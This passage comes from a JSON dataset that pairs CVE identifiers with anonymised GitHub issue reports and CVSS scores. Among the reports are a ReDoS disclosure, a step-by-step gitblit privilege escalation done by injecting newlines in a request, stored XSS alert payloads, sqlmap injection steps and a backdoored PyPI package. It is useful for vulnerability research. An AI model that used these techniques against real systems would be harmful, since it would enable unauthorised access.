grade High. Possible fix Either NUMBERTAG Drop the regular expression match feature completely and roll back to string match NUMBERTAG Enforce additional permission check when accepting user supplied regular expressions NUMBERTAG Migrate to a backtracking free regular expression engine NUMBERTAG not really NUMBERTAG a \"fix\") Enforce a timeout when performing a regular expression match NUMBERTAG not really NUMBERTAG a \"fix\") Disable the feature by default and require each instance maintainer to manually enable it NUMBERTAG The attack cost is still too low NUMBERTAG Still vulnerable if manually enabled and matching the \"condition to be vulnerable\". Timeline Considering the fix of the vulnerability is simple, I prefer a NUMBERTAG days timeline (UTC). Jun NUMBERTAG APITAG NUMBERTAG ulnerability found. Vulnerability reported. Jul NUMBERTAG APITAG NUMBERTAG If the email to EMAILTAG gets no response, I will immediately open an issue in the APITAG repository URLTAG , only informing maintainers there is a APITAG vulnerability without disclosing any vulnerability detail. Jun NUMBERTAG Jul NUMBERTAG APITAG NUMBERTAG Day NUMBERTAG If a fix is committed and pushed to the APITAG repository during this period, I will wait for NUMBERTAG hours in order that maintainers can disclose a security advisory URLTAG on APITAG No matter whether the security advisory has been disclosed or not, once the NUMBERTAG hour deadline is exceeded, I will immediately disclose the full report NUMBERTAG by opening an [issue in the APITAG repository URLTAG . Jul NUMBERTAG Jul NUMBERTAG APITAG NUMBERTAG Day NUMBERTAG Once a fix is committed and pushed to the APITAG repository during this period, I will immediately disclose the full report by opening an issue in the APITAG repository. Jul NUMBERTAG APITAG NUMBERTAG If no fix was committed and pushed to the APITAG repository during the previous two periods, I will immediately disclose the full report by opening an issue in the APITAG repository. Additional conditions Maintainers may ask me to disclose the full report before exceeding the NUMBERTAG hour deadline. Maintainers may consult with me to determine a new timeline, but that consultation must be disclosed along with the full report. If being replied \"won't fix\" or \"not a vulnerability\", I will immediately disclose the full report along with the reply by opening an issue in the APITAG repository. I reserve the right to apply for a CVE ID NUMBERTAG What you are reading. Timeline (in reality) Jun NUMBERTAG UTC NUMBERTAG h) Vulnerability reported. Jun NUMBERTAG UTC NUMBERTAG h) Vulnerability fixed. Replace the regular expression engine to a backtracking free one. Git hash: APITAG Jun NUMBERTAG UTC NUMBERTAG h) The fix was confirmed to be effective. Jun NUMBERTAG UTC NUMBERTAG h) The [security advisory URLTAG was published. Jun NUMBERTAG UTC NUMBERTAG h) Two commits \"for backward compatibility\" opened up the attack surface again by allowing instance maintainers to switch back to the vulnerable regular expression engine. Git hash: APITAG Pull request NUMBERTAG Git hash: APITAG Pull request NUMBERTAG Since they were created by a maintainer APITAG and approved by the repository owner APITAG I choose not to consider it as a vulnerability but document it here for warning (refer to the next chapter). Jun NUMBERTAG UTC NUMBERTAG h) The full report was able to be disclosed. Look back APITAG A APITAG attack is usually severe but cost less, \"defeating the strong with little effort\". APITAG Carelessness and the over trust in the regular expression engine requiring backtracking are the root causes of a APITAG vulnerability, while the common immediate causes are NUMBERTAG A regular expression engine requiring backtracking, and NUMBERTAG A catastrophic backtracking vulnerable regular expression, and NUMBERTAG A user supplied malicious strings. APITAG vulnerabilities are not very common since there must be a catastrophic backtracking vulnerable regular expression, which is usually written by programmers and out of the control of end users. APITAG in this vulnerability of APITAG things are different: both the regular expression and the string can be user supplied. APITAG In the POC, I merely showed how to supply a vulnerable regular expression. So how to understand why the string can also be user supplied? A fact is that some \"routes\" (e.g. APITAG ) grab posts from social media, resulting in anyone being able to post malicious strings and request APITAG to grab them. An experienced attacker may merely construct a vulnerable regular expression specially designed for some strings just like the one I have demonstrated. While an inexperienced attacker can easily use known combinations of vulnerable regular expressions and malicious strings. As a result, APITAG everyone who knows what catastrophic backtracking is can probably construct an effective attack APITAG . The fix adopts an alternative regular expression engine ( APITAG ) which is backtracking free. It is quite simple, but effective. It shows a nice example with functionality and security balanced. However, as mentioned, two commits (refer to the previous chapter) have opened up the attack surface again in certain conditions. Those commits re empower instance maintainers to switch back to the vulnerable regular expression engine, the vanilla built in APITAG one ( APITAG ). To be responsible, I warn instance maintainers again not to switch back to APITAG unless: Additional access control URLTAG is applied, or Your instance does not expose to the Internet, or You understand what are you doing exactly and do not care about APITAG attacks. Revisions Re NUMBERTAG Initial report. Re NUMBERTAG Document the chosen fix in the chapter APITAG fix\". Correct some wording and statements. Add two new chapters: APITAG (in reality)\" and APITAG back\". Re NUMBERTAG Minor revision. Document two commits opening up the attack surface again in certain conditions. What is actually happening? N/A Deployment information APITAG demo ( FILETAG Deployment information (for self hosted) N/A Additional info APITAG This is not a duplicated issue X] I have searched [existing issues URLTAG to ensure this bug has not already been reported",
  83703. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  83704. "severity": "HIGH",
  83705. "baseScore": 7.5,
  83706. "impactScore": 3.6,
  83707. "exploitabilityScore": 3.9
  83708. },
  83709. {
  83710. "CVE_ID": "CVE-2022-31259",
  83711. "Issue_Url_old": "https://github.com/beego/beego/issues/4946",
  83712. "Issue_Url_new": "https://github.com/beego/beego/issues/4946",
  83713. "Repo_new": "beego/beego",
  83714. "Issue_Created_At": "2022-05-17T06:42:50Z",
  83715. "description": "router PATHTAG can match PATHTAG URLTAG This modification is still not sufficient\uff0cfor router PATHTAG url like PATHTAG can also be matched FILETAG",
  83716. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  83717. "severity": "CRITICAL",
  83718. "baseScore": 9.8,
  83719. "impactScore": 5.9,
  83720. "exploitabilityScore": 3.9
  83721. },
  83722. {
  83723. "CVE_ID": "CVE-2022-31267",
  83724. "Issue_Url_old": "https://github.com/gitblit/gitblit/issues/1410",
  83725. "Issue_Url_new": "https://github.com/gitblit-org/gitblit/issues/1410",
  83726. "Repo_new": "gitblit-org/gitblit",
  83727. "Issue_Created_At": "2022-02-28T08:06:52Z",
  83728. "description": "A user privilege elevation vulnerability in the latest version of gitblit. Hello, I tried to contact the developers of your product but did not get a response, so I decided to raise the vulnerability to you in the issue, hoping that you can fix it as soon as possible to avoid a wider impact of the vulnerability. Principle of the vulnerability Gitblit uses file storage to manage user information, passwords, account types, and permissions. When a user with low privileges modifies their information, if they use line breaks and space characters, they can create new users or assign higher higher privileges. The relevant code logic is in the write function of APITAG . The reason for the problem is that gitblit does not do a checksum on the characters entered by the user, and malicious characters are printed directly in the file, causing gitblit to parse the file incorrectly when reading it. The location where users are saved is in APITAG The default APITAG is as follows. APITAG The user name is admin, the password is admin, and the user's permissions are admin permissions, and the file will change as the user logs in. After logging in once the file reads ERRORTAG If there is a new user, a new user will be created below the user, and which will be accompanied by the user's APITAG information, if the attacker in the modification of their own APITAG the APITAG set to APITAG ,you can modify the permissions of their own user to admin. Vulnerability recurrence NUMBERTAG The attacker has an account with no privileges, username test , password APITAG , and privileges None , and the current APITAG is. ERRORTAG NUMBERTAG After logging in, click on Profile APITAG in order FILETAG Turn on burpsuite's blocking feature, click Save, and block the request with burpsuite NUMBERTAG In burpsuite, make changes to the request. FILETAG Modify the value of APITAG to APITAG after url encoding. The APITAG at the end of the payload is to avoid the impact of the original role = \" none\". The encoding can be done using burpsuite's Decode function FILETAG NUMBERTAG After modifying the request body and sending the request, APITAG changes to the following state. FILETAG You can see that the test user has become admin privileges. Refreshing the page, at this point the test user has full access to gitblit, and can see all Git repositories and manage all users and teams FILETAG",
  83729. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  83730. "severity": "CRITICAL",
  83731. "baseScore": 9.8,
  83732. "impactScore": 5.9,
  83733. "exploitabilityScore": 3.9
  83734. },
  83735. {
  83736. "CVE_ID": "CVE-2022-31282",
  83737. "Issue_Url_old": "https://github.com/axiomatic-systems/Bento4/issues/708",
  83738. "Issue_Url_new": "https://github.com/axiomatic-systems/bento4/issues/708",
  83739. "Repo_new": "axiomatic-systems/bento4",
  83740. "Issue_Created_At": "2022-05-08T16:25:44Z",
  83741. "description": "SEGV on unknown address NUMBERTAG in PATHTAG SUMMARY: APITAG SEGV on unknown address NUMBERTAG in PATHTAG Version APITAG branch d NUMBERTAG ef NUMBERTAG URLTAG Platform ERRORTAG Steps to reproduce CODETAG Asan ERRORTAG poc: FILETAG Thanks!",
  83742. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  83743. "severity": "MEDIUM",
  83744. "baseScore": 5.5,
  83745. "impactScore": 3.6,
  83746. "exploitabilityScore": 1.8
  83747. },
  83748. {
  83749. "CVE_ID": "CVE-2022-31285",
  83750. "Issue_Url_old": "https://github.com/axiomatic-systems/Bento4/issues/702",
  83751. "Issue_Url_new": "https://github.com/axiomatic-systems/bento4/issues/702",
  83752. "Repo_new": "axiomatic-systems/bento4",
  83753. "Issue_Created_At": "2022-05-08T09:35:50Z",
  83754. "description": "allocator is out of memory in PATHTAG SUMMARY: APITAG allocator is out of memory in PATHTAG Version APITAG branch d NUMBERTAG ef NUMBERTAG URLTAG Platform ERRORTAG Steps to reproduce CODETAG Asan ERRORTAG poc: FILETAG Thanks!",
  83755. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  83756. "severity": "MEDIUM",
  83757. "baseScore": 5.5,
  83758. "impactScore": 3.6,
  83759. "exploitabilityScore": 1.8
  83760. },
  83761. {
  83762. "CVE_ID": "CVE-2022-31287",
  83763. "Issue_Url_old": "https://github.com/axiomatic-systems/Bento4/issues/703",
  83764. "Issue_Url_new": "https://github.com/axiomatic-systems/bento4/issues/703",
  83765. "Repo_new": "axiomatic-systems/bento4",
  83766. "Issue_Created_At": "2022-05-08T09:38:48Z",
  83767. "description": "requested allocation size NUMBERTAG fffffffffffffffd in PATHTAG SUMMARY: APITAG requested allocation size NUMBERTAG fffffffffffffffd in PATHTAG Version APITAG branch d NUMBERTAG ef NUMBERTAG URLTAG Platform ERRORTAG Steps to reproduce CODETAG Asan ERRORTAG poc: FILETAG Thanks!",
  83768. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  83769. "severity": "MEDIUM",
  83770. "baseScore": 5.5,
  83771. "impactScore": 3.6,
  83772. "exploitabilityScore": 1.8
  83773. },
  83774. {
  83775. "CVE_ID": "CVE-2022-31302",
  83776. "Issue_Url_old": "https://github.com/maccmspro/maccms8/issues/1",
  83777. "Issue_Url_new": "https://github.com/maccmspro/maccms8/issues/1",
  83778. "Repo_new": "maccmspro/maccms8",
  83779. "Issue_Created_At": "2022-05-17T01:14:56Z",
  83780. "description": "There are four storage XSS vulnerabilities. Enter the background, click video > server group > add,\u8fdb\u5165\u540e\u53f0\uff0c\u70b9\u51fb\u89c6\u9891 >\u670d\u52a1\u5668\u7ec4 >\u6dfb\u52a0\uff0c \u5728\u5730\u5740\u6846\u63d2\u5165payload NUMBERTAG APITAG APITAG alert NUMBERTAG APITAG \u5728\u5907\u6ce8\u6846\u63d2\u5165payload NUMBERTAG APITAG APITAG alert NUMBERTAG APITAG FILETAG FILETAG \u8fdb\u5165\u540e\u53f0\uff0c\u70b9\u51fb\u89c6\u9891 >\u64ad\u653e\u5668 >\u6dfb\u52a0\uff0c \u5728\u5730\u5740\u6846\u63d2\u5165payload NUMBERTAG APITAG APITAG alert NUMBERTAG APITAG \u5728\u5907\u6ce8\u6846\u63d2\u5165payload NUMBERTAG APITAG APITAG alert NUMBERTAG APITAG FILETAG",
  83781. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  83782. "severity": "MEDIUM",
  83783. "baseScore": 5.4,
  83784. "impactScore": 2.7,
  83785. "exploitabilityScore": 2.3
  83786. },
  83787. {
  83788. "CVE_ID": "CVE-2022-31303",
  83789. "Issue_Url_old": "https://github.com/maccmspro/maccms10/issues/20",
  83790. "Issue_Url_new": "https://github.com/maccmspro/maccms10/issues/20",
  83791. "Repo_new": "maccmspro/maccms10",
  83792. "Issue_Created_At": "2022-05-18T14:36:01Z",
  83793. "description": "\u540e\u53f0\u670d\u52a1\u5668\u7ec4\u4e2d\u5b58\u5728XSS\u6f0f\u6d1e. \u8fdb\u5165\u540e\u53f0\uff0c\u70b9\u51fb\u89c6\u9891 >\u670d\u52a1\u5668\u7ec4 >\u6dfb\u52a0\uff0c \u5728\u540d\u79f0\u6846\u63d2\u5165payload1\uff1a APITAG APITAG alert NUMBERTAG APITAG \u5728\u670d\u52a1\u5668\u7ec4\u5730\u5740\u6846\u63d2\u5165payload2\uff1a APITAG APITAG alert NUMBERTAG APITAG \u5728\u6392\u5e8f\u6846\u63d2\u5165payload3\uff1a APITAG APITAG alert NUMBERTAG APITAG \u5728\u63d0\u793a\u6846\u63d2\u5165payload4\uff1a APITAG APITAG alert NUMBERTAG APITAG FILETAG \u70b9\u51fb\u4fdd\u5b58\uff0c\u6210\u529f\u89e6\u53d1XSS\u6f0f\u6d1e FILETAG",
  83794. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  83795. "severity": "MEDIUM",
  83796. "baseScore": 5.4,
  83797. "impactScore": 2.7,
  83798. "exploitabilityScore": 2.3
  83799. },
  83800. {
  83801. "CVE_ID": "CVE-2022-31307",
  83802. "Issue_Url_old": "https://github.com/nginx/njs/issues/482",
  83803. "Issue_Url_new": "https://github.com/nginx/njs/issues/482",
  83804. "Repo_new": "nginx/njs",
  83805. "Issue_Created_At": "2022-03-02T11:46:11Z",
  83806. "description": "SEGV APITAG in njs_string_offset. Environment CODETAG Proof of concept ERRORTAG Stack dump ERRORTAG Credit Q1IQ( APITAG",
  83807. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  83808. "severity": "MEDIUM",
  83809. "baseScore": 5.5,
  83810. "impactScore": 3.6,
  83811. "exploitabilityScore": 1.8
  83812. },
  83813. {
  83814. "CVE_ID": "CVE-2022-31313",
  83815. "Issue_Url_old": "https://github.com/rakeshrkz7/as_api_res/issues/1",
  83816. "Issue_Url_new": "https://github.com/rakeshrkz7/as_api_res/issues/1",
  83817. "Repo_new": "rakeshrkz7/as_api_res",
  83818. "Issue_Created_At": "2022-05-17T12:06:02Z",
  83819. "description": "code execution backdoor. We found a malicious backdoor in version NUMBERTAG of this project in APITAG and its malicious backdoor is the request package. Even if the request package was removed by pypi, many mirror sites did not completely delete this package, so it could still be APITAG using pip3 install api res py i URLTAG trusted host APITAG the request malicious plugin can be successfully installed. FILETAG Repair suggestion: delete version NUMBERTAG in APITAG Your project in APITAG URLTAG",
  83820. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  83821. "severity": "CRITICAL",
  83822. "baseScore": 9.8,
  83823. "impactScore": 5.9,
  83824. "exploitabilityScore": 3.9
  83825. },
  83826. {
  83827. "CVE_ID": "CVE-2022-31325",
  83828. "Issue_Url_old": "https://github.com/ChurchCRM/CRM/issues/6005",
  83829. "Issue_Url_new": "https://github.com/churchcrm/crm/issues/6005",
  83830. "Repo_new": "churchcrm/crm",
  83831. "Issue_Created_At": "2022-05-17T16:53:06Z",
  83832. "description": "SQL Injection vulnerability in APITAG NUMBERTAG ia FILETAG . SQL Injection vulnerability in APITAG NUMBERTAG ia FILETAG . Step to exploit NUMBERTAG Login as admin NUMBERTAG Redirect to profile page and click on APITAG . FILETAG NUMBERTAG Submit APITAG Came\" notes and capture request in Burp Suite. FILETAG NUMBERTAG Save request and run sqlmap for injecting the APITAG parameter: APITAG FILETAG FILETAG",
  83833. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  83834. "severity": "HIGH",
  83835. "baseScore": 7.2,
  83836. "impactScore": 5.9,
  83837. "exploitabilityScore": 1.2
  83838. },
  83839. {
  83840. "CVE_ID": "CVE-2022-31386",
  83841. "Issue_Url_old": "https://github.com/Fanli2012/nbnbk/issues/5",
  83842. "Issue_Url_new": "https://github.com/fanli2012/nbnbk/issues/5",
  83843. "Repo_new": "fanli2012/nbnbk",
  83844. "Issue_Created_At": "2022-05-19T11:53:11Z",
  83845. "description": "FILETAG",
  83846. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
  83847. "severity": "CRITICAL",
  83848. "baseScore": 9.1,
  83849. "impactScore": 5.2,
  83850. "exploitabilityScore": 3.9
  83851. },
  83852. {
  83853. "CVE_ID": "CVE-2022-31390",
  83854. "Issue_Url_old": "https://github.com/Cherry-toto/jizhicms/issues/75",
  83855. "Issue_Url_new": "https://github.com/cherry-toto/jizhicms/issues/75",
  83856. "Repo_new": "cherry-toto/jizhicms",
  83857. "Issue_Created_At": "2022-05-23T02:01:23Z",
  83858. "description": "FILETAG",
  83859. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
  83860. "severity": "CRITICAL",
  83861. "baseScore": 9.1,
  83862. "impactScore": 5.2,
  83863. "exploitabilityScore": 3.9
  83864. },
  83865. {
  83866. "CVE_ID": "CVE-2022-31393",
  83867. "Issue_Url_old": "https://github.com/Cherry-toto/jizhicms/issues/76",
  83868. "Issue_Url_new": "https://github.com/cherry-toto/jizhicms/issues/76",
  83869. "Repo_new": "cherry-toto/jizhicms",
  83870. "Issue_Created_At": "2022-05-23T02:11:27Z",
  83871. "description": "FILETAG",
  83872. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
  83873. "severity": "CRITICAL",
  83874. "baseScore": 9.1,
  83875. "impactScore": 5.2,
  83876. "exploitabilityScore": 3.9
  83877. },
  83878. {
  83879. "CVE_ID": "CVE-2022-31501",
  83880. "Issue_Url_old": "https://github.com/github/securitylab/issues/669",
  83881. "Issue_Url_new": "https://github.com/github/securitylab/issues/669",
  83882. "Repo_new": "github/securitylab",
  83883. "Issue_Created_At": "2022-04-28T19:02:52Z",
  83884. "description": "Python : Flask Path Traversal Vulnerability. CVE(s) ID list This is a placeholder issue. I plan on sending bulk PR's to appro NUMBERTAG projects. I will add the CVE once the fixes are merged and identifiers are assigned. All For One submission URLTAG Details TBA Are you planning to discuss this vulnerability submission publicly? APITAG Post, social networks, etc). [X] Yes [ ] No Blog post link _No response_",
  83885. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:L",
  83886. "severity": "CRITICAL",
  83887. "baseScore": 9.3,
  83888. "impactScore": 4.7,
  83889. "exploitabilityScore": 3.9
  83890. },
  83891. {
  83892. "CVE_ID": "CVE-2022-31506",
  83893. "Issue_Url_old": "https://github.com/cmusatyalab/opendiamond/issues/52",
  83894. "Issue_Url_new": "https://github.com/cmusatyalab/opendiamond/issues/52",
  83895. "Repo_new": "cmusatyalab/opendiamond",
  83896. "Issue_Created_At": "2022-05-03T18:49:15Z",
  83897. "description": "Security Vulnerability Found. Absolute Path Traversal due to incorrect use of APITAG call A path traversal attack (also known as directory traversal) aims to access files and directories that are stored outside the web root folder. By manipulating variables that reference files with \u201cdot dot slash (../)\u201d sequences and its variations or by using absolute file paths, it may be possible to access arbitrary files and directories stored on file system including application source code or configuration and critical system files. This attack is also known as \u201cdot dot slash\u201d, \u201cdirectory traversal\u201d, \u201cdirectory climbing\u201d and \u201cbacktracking\u201d. Common Weakness Enumeration category CWE NUMBERTAG Root Cause Analysis The APITAG call is unsafe for use with untrusted input. When the APITAG call encounters an absolute path, it ignores all the parameters it has encountered till that point and starts working with the new absolute path. Please see the example below. CODETAG Since the \"malicious\" parameter represents an absolute path, the result of APITAG ignores the static directory completely. Hence, untrusted input is passed via the APITAG call to APITAG can lead to path traversal attacks. In this case, the problems occurs due to the following code : URLTAG Here, the APITAG parameter is attacker controlled. This parameter passes through the unsafe APITAG call making the effective directory and filename passed to the APITAG call attacker controlled. This leads to a path traversal attack. Proof of Concept The bug can be verified using a proof of concept similar to the one shown below. APITAG Remediation This can be fixed by preventing flow of untrusted data to the vulnerable APITAG function. In case the application logic necessiates this behaviour, one can either use the APITAG to join untrusted paths or replace APITAG calls with APITAG calls. Common Vulnerability Scoring System Vector The attack can be carried over the network. A complex non standard configuration or a specialized condition is not required for the attack to be successfully conducted. There is no user interaction required for successful execution. The attack can affect components outside the scope of the target module. The attack can be used to gain access to confidential files like passwords, login credentials and other secrets. It cannot be directly used to affect a change on a system resource. Hence has limited to no impact on integrity. Using this attack vector a attacker may make multiple requests for accessing huge files such as a database. This can lead to a partial system denial service. However, the impact on availability is quite low in this case. Taking this account an appropriate CVSS NUMBERTAG ector would be ( PATHTAG ) FILETAG This gives it a base score of NUMBERTAG and a severity rating of critical. References [OWASP Path Traversal URLTAG github/securitylab NUMBERTAG This bug was found using FILETAG",
  83898. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:L",
  83899. "severity": "CRITICAL",
  83900. "baseScore": 9.3,
  83901. "impactScore": 4.7,
  83902. "exploitabilityScore": 3.9
  83903. },
  83904. {
  83905. "CVE_ID": "CVE-2022-31558",
  83906. "Issue_Url_old": "https://github.com/tooxie/shiva-server/issues/189",
  83907. "Issue_Url_new": "https://github.com/tooxie/shiva-server/issues/189",
  83908. "Repo_new": "tooxie/shiva-server",
  83909. "Issue_Created_At": "2022-05-03T12:02:35Z",
  83910. "description": "Security Vulnerability Found. Absolute Path Traversal due to incorrect use of APITAG call A path traversal attack (also known as directory traversal) aims to access files and directories that are stored outside the web root folder. By manipulating variables that reference files with \u201cdot dot slash (../)\u201d sequences and its variations or by using absolute file paths, it may be possible to access arbitrary files and directories stored on file system including application source code or configuration and critical system files. This attack is also known as \u201cdot dot slash\u201d, \u201cdirectory traversal\u201d, \u201cdirectory climbing\u201d and \u201cbacktracking\u201d. Common Weakness Enumeration category CWE NUMBERTAG Root Cause Analysis The APITAG call is unsafe for use with untrusted input. When the APITAG call encounters an absolute path, it ignores all the parameters it has encountered till that point and starts working with the new absolute path. Please see the example below. CODETAG Since the \"malicious\" parameter represents an absolute path, the result of APITAG ignores the static directory completely. Hence, untrusted input is passed via the APITAG call to APITAG can lead to path traversal attacks. In this case, the problems occurs due to the following code : URLTAG Here, the APITAG parameter is attacker controlled. This parameter passes through the unsafe APITAG call making the effective directory and filename passed to the APITAG call attacker controlled. This leads to a path traversal attack. Proof of Concept The bug can be verified using a proof of concept similar to the one shown below. APITAG Remediation This can be fixed by preventing flow of untrusted data to the vulnerable APITAG function. In case the application logic necessiates this behaviour, one can either use the APITAG to join untrusted paths or replace APITAG calls with APITAG calls. Common Vulnerability Scoring System Vector The attack can be carried over the network. A complex non standard configuration or a specialized condition is not required for the attack to be successfully conducted. There is no user interaction required for successful execution. The attack can affect components outside the scope of the target module. The attack can be used to gain access to confidential files like passwords, login credentials and other secrets. It cannot be directly used to affect a change on a system resource. Hence has limited to no impact on integrity. Using this attack vector a attacker may make multiple requests for accessing huge files such as a database. This can lead to a partial system denial service. However, the impact on availability is quite low in this case. Taking this account an appropriate CVSS NUMBERTAG ector would be ( PATHTAG ) FILETAG This gives it a base score of NUMBERTAG and a severity rating of critical. References [OWASP Path Traversal URLTAG github/securitylab NUMBERTAG This bug was found using FILETAG",
  83911. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:L",
  83912. "severity": "CRITICAL",
  83913. "baseScore": 9.3,
  83914. "impactScore": 4.7,
  83915. "exploitabilityScore": 3.9
  83916. },
  83917. {
  83918. "CVE_ID": "CVE-2022-31581",
  83919. "Issue_Url_old": "https://github.com/scorelab/OpenMF/issues/262",
  83920. "Issue_Url_new": "https://github.com/scorelab/openmf/issues/262",
  83921. "Repo_new": "scorelab/openmf",
  83922. "Issue_Created_At": "2022-05-03T12:25:30Z",
  83923. "description": "Security Vulnerability Found. Absolute Path Traversal due to incorrect use of APITAG call A path traversal attack (also known as directory traversal) aims to access files and directories that are stored outside the web root folder. By manipulating variables that reference files with \u201cdot dot slash (../)\u201d sequences and its variations or by using absolute file paths, it may be possible to access arbitrary files and directories stored on file system including application source code or configuration and critical system files. This attack is also known as \u201cdot dot slash\u201d, \u201cdirectory traversal\u201d, \u201cdirectory climbing\u201d and \u201cbacktracking\u201d. Common Weakness Enumeration category CWE NUMBERTAG Root Cause Analysis The APITAG call is unsafe for use with untrusted input. When the APITAG call encounters an absolute path, it ignores all the parameters it has encountered till that point and starts working with the new absolute path. Please see the example below. CODETAG Since the \"malicious\" parameter represents an absolute path, the result of APITAG ignores the static directory completely. Hence, untrusted input is passed via the APITAG call to APITAG can lead to path traversal attacks. In this case, the problems occurs due to the following code : URLTAG Here, the APITAG parameter is attacker controlled. This parameter passes through the unsafe APITAG call making the effective directory and filename passed to the APITAG call attacker controlled. This leads to a path traversal attack. Proof of Concept The bug can be verified using a proof of concept similar to the one shown below. APITAG Remediation This can be fixed by preventing flow of untrusted data to the vulnerable APITAG function. In case the application logic necessiates this behaviour, one can either use the APITAG to join untrusted paths or replace APITAG calls with APITAG calls. Common Vulnerability Scoring System Vector The attack can be carried over the network. A complex non standard configuration or a specialized condition is not required for the attack to be successfully conducted. There is no user interaction required for successful execution. The attack can affect components outside the scope of the target module. The attack can be used to gain access to confidential files like passwords, login credentials and other secrets. It cannot be directly used to affect a change on a system resource. Hence has limited to no impact on integrity. Using this attack vector a attacker may make multiple requests for accessing huge files such as a database. This can lead to a partial system denial service. However, the impact on availability is quite low in this case. Taking this account an appropriate CVSS NUMBERTAG ector would be ( PATHTAG ) FILETAG This gives it a base score of NUMBERTAG and a severity rating of critical. References [OWASP Path Traversal URLTAG github/securitylab NUMBERTAG This bug was found using FILETAG",
  83924. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:L",
  83925. "severity": "CRITICAL",
  83926. "baseScore": 9.3,
  83927. "impactScore": 4.7,
  83928. "exploitabilityScore": 3.9
  83929. },
  83930. {
  83931. "CVE_ID": "CVE-2022-31783",
  83932. "Issue_Url_old": "https://github.com/liblouis/liblouis/issues/1214",
  83933. "Issue_Url_new": "https://github.com/liblouis/liblouis/issues/1214",
  83934. "Repo_new": "liblouis/liblouis",
  83935. "Issue_Created_At": "2022-05-21T13:15:50Z",
  83936. "description": "FILETAG FILETAG POC FILETAG",
  83937. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  83938. "severity": "MEDIUM",
  83939. "baseScore": 5.5,
  83940. "impactScore": 3.6,
  83941. "exploitabilityScore": 1.8
  83942. },
  83943. {
  83944. "CVE_ID": "CVE-2022-31796",
  83945. "Issue_Url_old": "https://github.com/thorfdbg/libjpeg/issues/71",
  83946. "Issue_Url_new": "https://github.com/thorfdbg/libjpeg/issues/71",
  83947. "Repo_new": "thorfdbg/libjpeg",
  83948. "Issue_Created_At": "2022-05-24T03:23:18Z",
  83949. "description": "heap overflow in APITAG There is a heap overflow in APITAG in APITAG reproduce steps NUMBERTAG unzip FILETAG NUMBERTAG compile libjpeg with address sanitizer enabled NUMBERTAG run jpeg ./poc /dev/null poc FILETAG stack trace ERRORTAG",
  83950. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  83951. "severity": "MEDIUM",
  83952. "baseScore": 6.5,
  83953. "impactScore": 3.6,
  83954. "exploitabilityScore": 2.8
  83955. },
  83956. {
  83957. "CVE_ID": "CVE-2022-31830",
  83958. "Issue_Url_old": "https://github.com/fex-team/kityminder/issues/345",
  83959. "Issue_Url_new": "https://github.com/fex-team/kityminder/issues/345",
  83960. "Repo_new": "fex-team/kityminder",
  83961. "Issue_Created_At": "2022-05-25T12:23:32Z",
  83962. "description": "FILETAG",
  83963. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
  83964. "severity": "CRITICAL",
  83965. "baseScore": 9.1,
  83966. "impactScore": 5.2,
  83967. "exploitabilityScore": 3.9
  83968. },
  83969. {
  83970. "CVE_ID": "CVE-2022-31836",
  83971. "Issue_Url_old": "https://github.com/beego/beego/issues/4961",
  83972. "Issue_Url_new": "https://github.com/beego/beego/issues/4961",
  83973. "Repo_new": "beego/beego",
  83974. "Issue_Created_At": "2022-05-23T12:59:50Z",
  83975. "description": "Function APITAG use APITAG to deal with APITAG , which may lead to cross directory risk. . Function APITAG use APITAG to deal with APITAG , which may lead to cross directory risk. poc1: route end with APITAG can use APITAG to cross directory and set evil evil value for APITAG . URLTAG URLTAG For route APITAG , urls below can match, and set APITAG APITAG APITAG APITAG note:./ can repeat any times Test code as below: CODETAG FILETAG poc2: regex route can use APITAG to cross directory and replace wildcard with evil value URLTAG For regex route APITAG ,urls below can match and value of APITAG APITAG can be replaced with evil value. APITAG APITAG APITAG note:./ can repeat any times CODETAG FILETAG",
  83976. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  83977. "severity": "CRITICAL",
  83978. "baseScore": 9.8,
  83979. "impactScore": 5.9,
  83980. "exploitabilityScore": 3.9
  83981. },
  83982. {
  83983. "CVE_ID": "CVE-2022-31943",
  83984. "Issue_Url_old": "https://github.com/ming-soft/MCMS/issues/95",
  83985. "Issue_Url_new": "https://github.com/ming-soft/mcms/issues/95",
  83986. "Repo_new": "ming-soft/mcms",
  83987. "Issue_Created_At": "2022-05-27T15:05:46Z",
